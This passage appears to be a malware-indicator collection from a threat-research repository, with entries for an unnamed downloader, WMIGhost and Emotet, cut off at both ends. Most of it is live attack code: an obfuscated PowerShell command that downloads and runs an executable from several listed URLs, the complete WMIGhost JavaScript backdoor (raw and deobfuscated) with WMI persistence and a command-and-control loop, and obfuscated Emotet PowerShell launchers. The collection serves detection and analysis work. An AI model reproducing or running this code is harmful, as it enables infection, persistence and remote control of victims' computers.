^1^5^0 ^1^0^3^ 59^1 ^359 ^53^9^ 9^1^3^ 139 ^13^5 3^95^ ^351 ^9^1^0}^135^}930^{^0^51h9^30c305^t310a03^9c^30^5^}9^3^5;^1^0^9^k^5^0^1a1^0^3e^1^3^9r^1^3^9^b^591^;^13^5^K5^0^9^T^90^5^I^953$0^9^5^ 039m5^30e^0^9^1t10^5I^1^59^-10^9e^9^31^k^30^5^o3^50v^5^9^3n93^0^I^30^9^;31^0)^503^K051^T509I^3^10^$^35^0^ ^059,^3^91^q^3^95^u35^9P159^$59^1(035e9^10l^39^0^i905^F^13^0^d^9^0^5a^5^9^1o^9^5^0^l039n^9^0^5^w91^3^o30^5D195^.9^10^z^05^1^m135^T^1^9^3^$^50^9{3^90y109r539^t13^5^{^5^0^9)95^1d^391^Y093q^0^9^3$^01^9 519n^930i^309 5^93^q^391u5^0^9^P309$^51^9(^5^1^0h1^5^9c^5^0^3a9^5^0^e^319r0^5^3o^51^0^f^931^;^0^13^'13^5^e^53^9x^09^5^e^90^1^.^1^9^5^'^1^3^5+51^9J^9^35^t5^90^q3^0^9$3^5^1+^5^9^3^'^913\^9^01'3^5^0^+315c35^9i9^31^l^9^31b01^5^u^935^p0^51:^0^53v^5^0^9n^5^30e^153$^1^0^5=^01^3K319T531^I1^0^5$5^9^1;53^9^'05^1^9^30^17^39^1^9^51^0^'5^39 590=^3^19 935^J5^1^3t3^5^0q^135$3^15;9^05)05^9^'501^@093^'^3^59(^359^t^3^5^9i319^l1^95^p^159S501.^0^15^'9^30^K0^15I^95^0m^10^3^y^359E^13^0^K^5^0^1^m^3^9^0^K031/093^b3^01u^3^1^0p53^1.931e93^1^l^5^13i0^1^3^a3^5^1/^93^1/^31^9^:3^59^p019t5^3^9t^0^59h153^@^91^3x^3^50^7591C^51^9^851^0^6^195f^951^S01^57^51^0/9^13^l935n0^93.^13^5s^01^3u15^3^i0^15^l^519^e03^1w0^13r^3^9^1^e^350v^5^1^0^s5^90g0^5^1/930/9^1^3:0^3^1p503t31^5^t5^3^0h^305^@^1^53^k9^15/^53^0g39^5r1^5^0^o59^3^.^1^5^3y^31^0e^5^90k35^1c195o503^h19^3s9^13^t^03^9a^10^5c^9^53l^0^5^9^l^0^5^3e^931h31^9/3^05/130:031p1^09t59^1t^01^9h^3^01^@10^5X^3^9^0^X^1^0^5S5^10^H5^30^m^350^7351/^3^95^m10^9o1^59c^9^13^.395^y5^03h^0^93^p^5^03^a^190r^3^50g^30^9o^513^t^903^o^1^5^9^h301^p095s1^5^3^k1^39e531^e^053w^1^39f1^53f^301^e5^9^3j^5^0^1/9^5^3/^951:^1^09^p309t19^0t915h935@1^39^J5^0^3O^9^35L91^0^6^3^05^E^3^01X150/35^1^m39^1^o1^5^3c^05^9.1^53^z3^05k190c391^i^1^5^9^t3^5^1s1^09y9^35e950k^1^3^9c^3^1^0^o^519h^53^1/^1^9^3/095:^0^35p^509t510t953h^9^10'9^35=^1^35d^95^0^Y10^9q^3^5^1$^509;^390^t^5^09n^39^0^e^19^0^i^195^l^3^5^0C^950^b^139^e^019W^0^1^5.39^0t395^e01^3N^51^3^ ^1^35^t91^5c5^1^9^e^5^9^0j^50^3^b^1^9^3^o^9^31-^1^0^9^w^9^30^e^310n193^=91^0^z501^m^10^5^T^09^5^$^91^3^ 95^0^l0^5^1l^9^10e0^13h351s^951r^0^51e0^31^w019o093^p&&^f^or /^L %^j ^in (^14^5^5,-4,^3)^do ^s^et ?^]=!?^]!!;^$:~%^j,1!&&i^f %^j ^le^q ^3 ca^l^l %?^]:~^4%" 22 | ``` 23 | 24 | Partially deobfuscated 25 | ``` 26 | CMd /V:/C"set ;$=301 309 051 519 591 150 531 150 103 591 359 539 913 139 135 395 351 910}135}930{051h930c305t310a039c305}935;109k501a103e139r139b591;135K509T905I953$095 039m530e091t105I159-109e931k305o350v593n930I309;310)503K051T509I310$350 059,391q395u359P159$591(035e910l390i905F130d905a591o950l039n905w913o305D195.910z051m135T193$509{390y109r539t135{509)951d391Y093q093$019 519n930i309 593q391u509P309$519(510h159c503a950e319r053o510f931;013'135e539x095e901.195'135+519J935t590q309$351+593'913\901'350+315c359i931l931b015u935p051:053v509n530e153$105=013K319T531I105$591;539'051930173919510'539 590=319 935J513t350q135$315;905)059'501@093'359(359t359i319l195p159S501.015'930K015I950m103y359E130K501m390K031/093b301u310p531.931e931l513i013a351/931/319:359p019t539t059h153@913x3507591C51985106195f951S0157510/913l935n093.135s013u153i015l519e031w013r391e350v510s590g051/930/913:031p503t315t530h305@153k915/530g395r150o593.153y310e590k351c195o503h193s913t039a105c953l059l053e931h319/305/130:031p109t591t019h301@105X390X105S510H530m3507351/395m109o159c913.395y503h093p503a190r350g309o513t903o159h301p095s153k139e531e053w139f153f301e593j501/953/951:109p309t190t915h935@139J503O935L9106305E301X150/351m391o153c059.153z305k190c391i159t351s109y935e950k139c310o519h531/193/095:035p509t510t953h910'935=135d950Y109q351$509;390t509n390e190i195l350C950b139e019W015.390t395e013N513 135t915c519e590j503b193o931-109w930e310n193=910z501m105T095$913 950l051l910e013h351s951r051e031w019o093p&&for /L %j in (1455,-4,3)do set ?]=!?]!!;$:~%j,1!&&if %j leq 3 call %?]:~4%" 27 | ``` 28 | 29 | * Powershell.exe 30 | 31 | 1. 32 | ``` 33 | $Tmz=new-object Net.WebClient;$qYd='http://hockeystickz.com/XE6LOJ@http://jeffweeksphotography.com/7mHSXX@http://hellcatshockey.org/k@http://gsverwelius.nl/7Sf68C7x@http://aile.pub/KmKEymIK'.Split('@');$qtJ = '979';$ITK=$env:public+'\'+$qtJ+'.exe';foreach($Puq in $qYd){try{$Tmz.DownloadFile($Puq, $ITK);Invoke-Item $ITK;break;}catch{}} 34 | ``` 35 | 36 | 37 | #### Regular Expressions 38 | --- 39 | 40 | `` 41 | `` 42 | 43 | #### Resources 44 | --- 45 | 46 | Technical write-ups: 47 | * 48 | 49 | Sandbox reports: 50 | * https://www.hybrid-analysis.com/sample/d40f5ae2f85b62351f2e8b0f068a8c3695d228b0f06b8015a513eb919b70f5bb?environmentId=100 51 | * https://www.hybrid-analysis.com/sample/7ff75d41557843d9981e0f3aa7e46fa0a936b8a8a55fcdce6912b102c9860370?environmentId=100 52 | 53 | Notes: 54 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /Malwares/WMIGhost.md: -------------------------------------------------------------------------------- 1 | ## WMIGhost 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Scrcons.exe 8 | 9 | `` 10 | function e(e,t){var n="winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\subscription",r=GetObject(n+":ActiveScriptEventConsumer").spawninstance_();r.name="ProbeScriptFint",r.scriptingengine="javascript",r.ScriptText=t+"var sOwner='"+e+"';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\"%PCI%\\\" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\"scrcons.exe\\\"'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();";var i=r.Put_();r=GetObject(n+":__IntervalTimerInstruction").spawninstance_(),r.Timerid="ProbeScriptFint",r.IntervalBetweenEvents=6e3,r.Put_(),r=GetObject(n+":__EventFilter").spawninstance_(),r.name="ProbeScriptFint",r.Query='select * from __timerevent where timerid="ProbeScriptFint"',r.QueryLanguage="WQL";var s=r.Put_();return r=GetObject(n+":__FilterToConsumerBinding").SpawnInstance_(),r.Consumer=i.path,r.Filter=s.path,r.Put_(),""};e("XDD",'var sXmlUrl="http://kumardeep.sosblogs .com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff .com/anilchopra/feed/;http://www.blogster .com/kapoorsunil09/profile/rss";'); 11 | `` 12 | 13 | Deobfuscated 14 | ``` 15 | var sXmlUrl = 16 | "http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss"; 17 | var sOwner = "XDD"; 18 | var MAIN = function() { 19 | $ = this; 20 | $.key = "W"; 21 | $.sFeedUrl = sXmlUrl; 22 | $.sOwner = sOwner; 23 | $.sXmlUrl = ""; 24 | $.oHttp = null; 25 | $.oShell = null; 26 | $.oStream = null; 27 | $.sHostName = null; 28 | $.sOSType = null; 29 | $.sMacAddress = null; 30 | $.sURLParam = null; 31 | $.version = "2.0.0"; 32 | $.runtime = 5000; 33 | $.oWMI = null; 34 | $._x = ActiveXObject; 35 | }; 36 | MAIN.prototype = { 37 | InitObjects: function() { 38 | $.oWMI = GetObject( 39 | "winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2" 40 | ); 41 | $.oShell = new $._x("WScript.Shell"); 42 | $.oStream = new $._x("ADODB.Stream"); 43 | $.GetOSInfo(); 44 | $.GetMacAddress(); 45 | $.GenerateUrlParam(); 46 | }, 47 | WMI: function(sql) { 48 | return $.oWMI.ExecQuery(sql); 49 | }, 50 | GetOSInfo: function() { 51 | var e = new Enumerator($.WMI("Select * from Win32_OperatingSystem")); 52 | if (!e.atEnd()) { 53 | var item = e.item(); 54 | $.sOSType = item.Caption + item.ServicePackMajorVersion; 55 | $.sHostName = item.CSName; 56 | } 57 | }, 58 | GetMacAddress: function() { 59 | var e = new Enumerator( 60 | $.WMI( 61 | 'Select * from Win32_NetworkAdapter where PNPDeviceID like "%PCI%" and NetConnectionStatus=2' 62 | ) 63 | ); 64 | if (!e.atEnd()) { 65 | $.sMacAddress = e.item().MACAddress; 66 | } 67 | }, 68 | GenerateUrlParam: function() { 69 | var time = new Date(); 70 | $.sURLParam = 71 | "cstype=server&authname=servername&authpass=serverpass&hostname=" + 72 | $.sHostName + 73 | "&ostype=" + 74 | $.sOSType + 75 | "&macaddr=" + 76 | $.sMacAddress + 77 | "&owner=" + 78 | $.sOwner + 79 | "&version=" + 80 | $.version + 81 | "&runtime=" + 82 | $.runtime; 83 | $.sURLParam += "&t=" + time.getMinutes() + time.getSeconds(); 84 | }, 85 | CleanObjects: function() { 86 | $.oShell = null; 87 | $.oStream = null; 88 | var e = new Enumerator( 89 | $.WMI('Select * from Win32_Process where Name="scrcons.exe"') 90 | ); 91 | while (!e.atEnd()) { 92 | e.item().terminate(); 93 | e.moveNext(); 94 | } 95 | }, 96 | Decode: function(sourceStr) { 97 | var keycode = sourceStr.charCodeAt(0); 98 | var source = sourceStr.substr(1); 99 | var vals = source.split(","); 100 | var result = ""; 101 | for (var i = 0; i < vals.length; i++) { 102 | result += String.fromCharCode(vals[i] ^ keycode); 103 | } 104 | return result; 105 | }, 106 | circleDecode: function(sc) { 107 | var base = sc.charCodeAt(0); 108 | var s = base - 32; 109 | var r = ""; 110 | for (var i = 1; i < sc.length; i++) { 111 | var nc = sc.charCodeAt(i) - s - i + 1; 112 | if (nc < 32) { 113 | nc = 126 + (nc - 32) % 94; 114 | } 115 | r += String.fromCharCode(nc); 116 | } 117 | return r; 118 | }, 119 | MainLoop: function() { 120 | $.oHttp = new $._x("Microsoft.XmlHttp"); 121 | var feedUrlArry = $.sFeedUrl.split(";"); 122 | var start = new Date(); 123 | var oXml = new ActiveXObject("MSXML2.DOMDocument.3.0"); 124 | for (var n = 0; n < feedUrlArry.length; n++) { 125 | var UrlList = new Array(); 126 | var URLnum = 0; 127 | try { 128 | var tstr = feedUrlArry[n].match("http://.*?\\.php"); 129 | if (tstr != null) { 130 | UrlList[URLnum++] = tstr; 131 | } else { 132 | $.oHttp.Open("GET", feedUrlArry[n], false); 133 | $.oHttp.setRequestHeader( 134 | "User-Agent", 135 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5" 136 | ); 137 | $.oHttp.Send(); 138 | 139 | var response = $.oHttp.ResponseText.replace(/(^\s*)|(\s*$)/g, ""); 140 | var re = /@(.*)@<\/title>+/g; 141 | var titleList = response.match(re); 142 | for (var i = 0; i < titleList.length; i++) { 143 | try { 144 | oXml.loadXML(titleList[i]); 145 | var container = oXml.getElementsByTagName("title"); 146 | var tmpstr = container[0].text.match("@(.*)@"); 147 | UrlList[URLnum++] = $.circleDecode(tmpstr[1]); 148 | } catch (e) {} 149 | } 150 | } 151 | for (var Urlindex = 0; Urlindex < UrlList.length; Urlindex++) { 152 | $.sXmlUrl = UrlList[Urlindex]; 153 | var runnum = 360; 154 | while (runnum-- > 0) { 155 | $.oHttp.Open("POST", $.sXmlUrl, false); 156 | $.oHttp.setRequestHeader( 157 | "CONTENT-TYPE", 158 | "application/x-www-form-urlencoded" 159 | ); 160 | $.oHttp.Send($.sURLParam); 161 | 162 | var response = $.oHttp.ResponseText.replace(/(^\s*)|(\s*$)/g, ""); 163 | if (response.length > 0) { 164 | var commands = null; 165 | var container; 166 | try { 167 | oXml.loadXML(response); 168 | container = oXml.getElementsByTagName("div"); 169 | for (var i = 0; i < container.length; i++) { 170 | if (container[i].getAttribute("id") == "0a552b5a4352") { 171 | commands = eval("(" + container[i].text + ")").command; 172 | } 173 | } 174 | } catch (e) {} 175 | if (commands != null) { 176 | var commandresult = ""; 177 | for (var i = 0; i < commands.length; i++) { 178 | var result = "no response"; 179 | try { 180 | result = eval($.Decode(commands[i].value)); 181 | } catch (e) {} 182 | if (i > 0) { 183 | commandresult += ","; 184 | } 185 | commandresult += 186 | "'" + commands[i].id + "':'" + escape(result) + "'"; 187 | } 188 | if (commandresult.length > 0) { 189 | commandresult = "{" + commandresult + "}"; 190 | $.oHttp.Open("POST", $.sXmlUrl, false); 191 | $.oHttp.setRequestHeader( 192 | "CONTENT-TYPE", 193 | "application/x-www-form-urlencoded" 194 | ); 195 | $.oHttp.Send( 196 | $.sURLParam + 197 | "&command=result&commandresult=" + 198 | commandresult 199 | ); 200 | } 201 | } else { 202 | $.sXmlUrl = ""; 203 | runnum = 0; 204 | } 205 | } 206 | $.runtime = new Date().getTime() - start.getTime(); 207 | WScript.Sleep(10000); 208 | } 209 | if ($.sXmlUrl.length > 0) { 210 | return; 211 | } 212 | } 213 | } catch (e) {} 214 | } 215 | }, 216 | Fire: function() { 217 | $.InitObjects(); 218 | try { 219 | $.MainLoop(); 220 | } catch (e) {} 221 | $.CleanObjects(); 222 | } 223 | }; 224 | new MAIN().Fire(); 225 | ``` 226 | 227 | #### Regular Expressions 228 | --- 229 | 230 | `` 231 | `` 232 | 233 | #### Resources 234 | --- 235 | 236 | Technical write-ups: 237 | * https://secrary.com/ReversingMalware/WMIGhost/ @_qaz_qaz 238 | 239 | 240 | Sandbox reports: 241 | * https://www.hybrid-analysis.com/sample/a6ff8dfe654da70390cd71626cdca8a6f6a0d7980cd7d82269373737b04fd206?environmentId=100 242 | 243 | Notes: 244 | 245 | 246 | 247 | 248 | -------------------------------------------------------------------------------- /Malwares/Emotet.md: -------------------------------------------------------------------------------- 1 | ## Emotet 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Cmd.exe 8 | 9 | 1. 10 | ``` 11 | dWbtPtDObhv MRZqnKhPtUqbVYjQmpdfvDWCtQj hJNjiiIJOGttb & %C^om^S^pEc% %C^om^S^pEc% /V /c set %loVqFNsnWSOoQXU%=jTMkdiizHojdor&&set %var1%=p&&set %var2%=ow&&set %vRwmclCkupwoRzI%=UuIwUIHrb&&set %var7%=!%var1%!&&set %DKViQiPwiWwsiuj%=wYXlpQhqqUoUsX&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %nJELZbjBiKjpnaL%=pzZCXkjGmm&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! " ( [RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marshal].GeTMEmbERS()[2].nAME).inVOKe([RUNtIme.intEropseRVICEs.MarShal]::SeCURestrINgtogLoBaLaLloCUnicOde( $('76492d1116743f0423413b16050a5345MgB8ADYAYwB4AHAAdgAxAHEAdQAvAEkAVQBXADQANQBrAFUAWgBkAEIANwBTAGcAPQA9AHwAYgAyADUAOQAwADMAYgBkAGMAOAA1AGMANwA0ADgAZgBhADUAYQBhAGIAYgBkADcAMwA1ADgAYwA3ADIANwA1ADAAZAA4AGEAYQBiADEANwBkADIAMwA3ADMANABlAGUAOAAxADUAZQA3ADAAOAAxADMAZQAyADIAZQBlADUAOAAxADcAMQAxAGUAOAA4ADUAOQAzADcAMwBlADcAOABmADYAYwA5ADkANAA3ADMAMABhAGMAMwAzADIAMQAxADcAYwA2AGQAMgAxADAAZQAyADQAZgAyAGUAMQA0ADMANABkAGIANAAxADAAMABlADAANAA0AGUAMwBjADYAYQAzAGUANgA2ADQAYQBmADgANwA4ADYAMQAwAGIAOAA2AGYAOQBmADYAOAAyAGUANAA4ADAAOAA3ADQAZgA4AGMAZQAxADUAYQAxADIAYwA5AGIAMgBmADcAYgBhAGQAYwAyADQANQAxADcAOQA4AGMANQA0AGMAYgAwADkAZAA0ADYAMAA4ADYAYQAyAGMAYwAxAGEANAA2ADQAZABmADUAMQBhADQAZQA3AGQAZABlADQANgA5AGQAYwA2ADIAOAA4ADEAMwBiADQAYwBlAGIANQA1ADYAMAAwADUAOQA1ADQAOQBmADAAMgBhADUAOQBiADQANABhAGMAZgAxADEANAA3ADcANgA2ADIAYgA4ADUANwA1ADUANQAxADEAOABlAGQAMAA2ADAAZABiADQAZABjAGMAYQBmADgAYQAzAGYAZQBhAGIAMgA0ADQANgBmADgAMwBlADQANwAyADcAYwBhAGIAMQA2ADIAOQA4ADcANwBlAGYAZAAwADYAYwAyADAAYgAyAGMANABlADIAYgBiAGQAYQA4ADQAZQAzADgAZgA2ADAANQAzAGIAYgBlAGUAZQAzAGQAZQBiAGYAMABkADMAZgA5AGUANwAzADYAZQAwADYANgA4ADUAZAA2ADkAMwBlAGUANwA1ADEAMgA1ADIAMAA3ADEAZgBjADQAMgAxADQAYwBjADYAMQBiADkAYgA0ADEAOQBjADQAOAAzADkANAAyADYAMQAzADgANAA4ADcAYQA5AGQANwAxADkAMAA5AGIANABjADUAYQBiADAAYQA2AGEANABjAGEANgBhADMAZgBiADgAOQBkAGEAZQBkAGUAYwBkAGUAZQA3AGQAYwBiAGEAMwA5ADAAMAA0AGMAMQA2AGMAOQA1AGQAYQA1AGUAYgBmAGYAYwBjADMAYQBlAGUANABiADQAMwBhADAAOQAxAGMAOQA5AGUAZAAzADAAZAA1ADMAOAAxAGUANQAzADAANABlADkAYwAxAGMAMwBmADAANQBlADYAYwA3AGYAMwAxADgANAAxADEANQA0ADIAOQA5AGMAZQA0AGUAMAAzADkAMgA5AGIANQAxADAANgA2ADAAOAA4AGIAMwAzAGYANgBiADcAOQBjAGQAZQA4AGYAZQAxAGYAOAAyADAANQAxADkANgBhAGMANAAzADMAYwAyAGYAYwBlADIAOAAwAGQANgA5ADQANgAwAGEANABlADAAZABjADYAYgBmADkAOAA5AGMAMwA0ADQAZgAzADIAZQBiAGMAOABkADcANwBhADkAMwAwAGQAMAA4AGEAZgA4ADkAYgAyAGUAZAAyAGQAMAA1ADEANwAxADMAOQA1ADIAOQBhAGUANgAzADYAMwBhADMAOQBiAGEAZQA4AGYAZQBiAGMAYQAyADMAYgAxADQAZQAyAGYAOABkAGUAOAA2AGIAOQA0AGYANAA0AGQAMABhADEAZgBmADAAOABjADkAYgBlAGQANABmAGIAMgBiADMAYQA5ADEAZgBiAGMANgAyADcAMwA4AGUAYQBjADAAZABlADkAZgBiAGUAYwAxAGUAOAA4ADkANwA5ADAAOAAyAGIANgAxADUAMQA3AGQAMwBmADUAZABkADMAZgBmADUAZQA1AGUANABlADMANgAzAGYANwA4ADMAMwA2AGEANgAyAGUANwAyADcAYQAyAGIAMwA2ADgAMgBiADUANAAxADcAOQBjADAAYgA5ADIAZQBjADQANQAxADcANwBmADIAYgBiADgAOAA0ADAANgAxAGMAMAA5ADgANgBkADcAMAA2ADcANwAxAGMAYgBiADEANgBmADEAMQAyADAANQA2AGMANQAyADkAMgAyADMAMQAwAGMAYQAyADkAOQBjADgAMwAyAGYANQBmADUAYgA4AGUAZgBhADAAZQBkADgANABjAGUAMQBiAGIAMgBlAGEANwAyAGQAYQA5ADcAOQAwADcAZgBjADgAZQA2ADQANwA2AGIANwA2ADgAZAAzAGUAZAAwADgANQBkADQAYwA4AGYAYwAxADAAZQBkADAAMQA2AGQANQAxADkAOQAxADUAZAA4ADgANwBjAGUAMgBkADgANwAxADAAMgBmADgANgAwADkANAA1AGEAOABkAGMAYgA4AGYAZQAwAGUAZQBkAGQAOQA5ADYANwBkADkAYQAzAGIANgBjAGMAZgBjAGIAMQA0ADEAZAAxADEAZABlADQAZgAwADgANAAyADcAOAA1ADYANwAyADUAOABhADEAZgBjADcAZQA3ADgANwA1ADUAYQBkADgAMgA3ADkAMgAxAGYAZgA1ADIAZQA0ADMAYwA2ADIAYQAwADEAOQBjADEAMgBiADgAOQAyADIAMgAwADAAOAA5ADEAYwBjADEAMAA4ADMAZQA2ADAAOQBkADQAMwAwADAAMQA1ADAANABjADQAYgA5ADMAMwAyAGEAMgA0ADYAMgAzADUANgA5ADgAMQBkADkAOQBjADgAMgAxADIAYwA0ADEANAA5AGYAZgBlADAAZAAyAGIAZQBhAGIAYgA5AGEANwBhADMAZAA3AGMAZAAxADgAOQBiADEAMQAzADUANABkAGUAOAAyAGQAMgAwAGUAMQAzAGQAZAA0AGEAZAA5ADIAYgA3AGQANwA3ADYAYwA0AGIAYwA0ADEAZAA1ADcAZgBlAGMAOQBmADcAZABjAGMAZQBiADcAZgBmADMAMAA1ADAAZQA3AGQANgBjADkAMQA0AGYANQBlADUAYgBjADIAOAAzADgAMQA3ADUAYQBjADAANgBhAGYAMgBiADAANwBlADYAZABlADYAZgA5ADEAMgBmADEAMgAyAGYAMAA3AGMANABhADMANwBhAGQANwAzADAANQBhADEAZABmAGMANAA5ADAAMgBlAGEAYQAwAGEAMwBkADQAYgA4ADQANgBlADcAZgAyADkAMQA3AGQAOABjADAANwA1AGQAYwA2ADEAOQBmADYAMwBiADQAMABmAGQAMwA3AGIAYQA4ADEAZAAzADQANABkADEAYwA0AGMAMgBiADQAMgBhADEANAA5AGMAZAA2AGUAYgAwAGMAZgAxADMAZgA3AGMAOQA4ADgANwAzADYAYwBjADIAMwA5ADgAMgA5AGIAZABlADIANwBiAGMAYgA0ADgAOAA3AGQAOAA3ADcANQA5ADIAMgAyADgAZQAwAGUAZgBmAGEAMAA3AGUAZgA5ADEANwAyADcAMwBlAGQANAAyADcAYgBhAGIAYgAzADEAMgA5AGYAOABlADUANQAwADQANgAwADQANQBmAGMAZABiAGQAMABjADQANQAxADYAYQAwADMANQA5ADQAOQAwAGUAYgAyAGUAMAAwAGEAOAAyAGEANQAxADEANgA2AGEANgA5ADEAMAA5AGQAYwA0AGMAZABmADkANwA5AGIAYgBkADIAZgA2AGQAZgBjADgAMABjAGUANgAxAGYAMwAyADUAZgBlADQAMgBlADQAOABkADAAMwAxADEANQBiADcANgA2ADUAMwBkAGEAOAAxADMAMgBkAGMAYQAxADQAYwA0ADMANAAyADkANwBmADAAOAA1AGEANwA5AGMANQBhADEANgBlADQAZAA5AGMAOAAyADMANgA1ADkAOAAwAGEAMwBlAGIAZABiADAAMQBmADkAZQA2AGYAMwAyAGIAMwAxADUAZABjADEAMQBlADMAYQBkAGYANgAxADEAZAAxADMAOQAyADIANQBmADgAOAAyAGMANwA4ADQAZgBmADQAMQBiAGQAZgBhADYAMABlADcAOQA4ADQANgA1ADEAYQBjADUAYwBjADcAMwA1ADMANwBjAGIANgA1ADQAZAA3ADIAOABjAGYAZQA0AGQAZgA2ADYAMQBkADEANQA3ADIAMQAyAGUAMwA3ADMAMAAxAGEAMABjADkAMQBhAGMAOQBhAGEAMQBkAGQAMgA2ADkAZgBiADcAYgA3AGUAYQBkAGYANAAwAGMANwBlADgAMwA3ADUAYwAxADgAYQA1AGEAMQA3ADcAMgBjAGEAMgAwADcAZgAzADMAOAA4AGEAZAA1ADcAZQBjADUAZQAwADkAMgAzAGYAZQBiAGMAYgA1ADAAZABjADUAMAA2AGEAYQAxAGYAYwBiAGQAYgBkAGIAMwBjADcANgAwADkAOABiADMAZQBmAGQAZAAzAGEAOQA4AGEAYgA3ADcANwBjAGMAMQAzAGEAMgA4ADMAYgBkAGUAMwA5ADgANQBiADMAMAAxAGQANQAxAGUANwA1AGUAYQA2ADgAZQA0AGUAYwBhAGUANABhAGUAOAA5AGMAZgAwADYAZQA0AGYAMQBlAGYAYQBkAGEAMAA1ADgAOQAzADAAMwAwADYAYwA5ADUANQA5AGMAMQBkADgANgBmADgANAAzADYAYwBjADIAMAAwADMAMgAwADMAMgBhADIAZABkADQAZQA0ADEAMwA2ADEANwA2ADQANwAxADIAYgAwADUAZgA1ADcAMAA3AGYAMgBjAGQANABjADAAZQA4ADgAMwBkAGQAYgA3ADgANAA2ADUAYgBkADAANgA4ADkAMgBkADEAOQBjADYAYQA0AGYAMgA2AGQAOABlAGYAZQBjAGIAMgBhADUAYQAyAGYAYQBjAGYAYwBjADIAZgAwADYANgA0ADkAZQAxADgAZABhADYAOQA2AGMANQAyADkAMQA5ADMAOQA3AGUANgA3ADEAMgAzAGUAOAA4AGYAYwA3AGIAMgA1ADIAYwAyAGYAMwAwADcAZABjADQAZgBhAGUANgA1ADEAMQAzADYANAA2ADgAYQA2AGQAMABjAGUAMgAwAGEAOQA3AGEAZgBjADAAZgBlADEAOQAxADkAZQA3AGQAOABhADYANgAwADUAMABkAGYAOQBmAGQAMwA=' |cOnvErtto-SeCureSTrINg -K (35..4)))))| . ( $VERBosePreFERENcE.TOStrIng()[1,3]+'x'-joIn'') 12 | ``` 13 | 14 | 2. 15 | ``` 16 | Cmd/C "Set ctSI= .( ([StriNG]$vERbOSEPrEFeReNce)[1,3]+'x'-JOIN'') (NEW-ObJEct io.CompreSSion.DefLAtestrEaM([IO.MemOrYStReam] [sYsTEm.COnVERT]::frOmbASE64STrINg('PZBda4MwFIb/Si4CqbhGuu3GBqGs28CxrowySmE3MT3W1JhIetAO8b9PZevted7znA/6tdWJhXbusjMoJB+AfA/Z2miwKGiaNgkrEOtlFEmPF4tQcuWq6ICf1q3+SCYLLZUHibqRE453h+1LXP4HlK4L8BXw2kRHiTJS7Q0V0g/DcncdG3nmo8fF+nyj8gLGyMo12p4mMy5OjO9qo3HGViwQdLN/Jwlh9w8xE7TKfULBNkuEqg7ZNwtHHjIOV2Aid8OOqpjRzdsT0ZaM5wUd+p+ODm/gz661xsnjqzYwZe7IKAxEahtXwjwdpFNFZIOnFL2SqIqu738B') ,[IO.CompRessiON.cOmpreSSIoNmoDE]::dECOmPreSs ) ^|FOReach { NEW-ObJEct sYstem.Io.StrEAmreAdeR( $_,[teXT.EnCoDiNG]::aSCii) } ^| foREaCh { $_.rEADtoENd() }) &&POwERshelL $oB84i = [tyPe]( \"{3}{0}{1}{2}\"-F'n','MEN','t','eNvirO' ) ; ${executiOnCONtExt}.\"InVokec`Om`ma`ND\".\"in`VO`KES`CrIPT\"( ( ( GET-IteM variabLE:oB84i ).vaLuE::( \"{1}{3}{2}{0}\" -f 'E','ge','NVIroNmEnTVARiABl','TE' ).Invoke( (\"{0}{1}\" 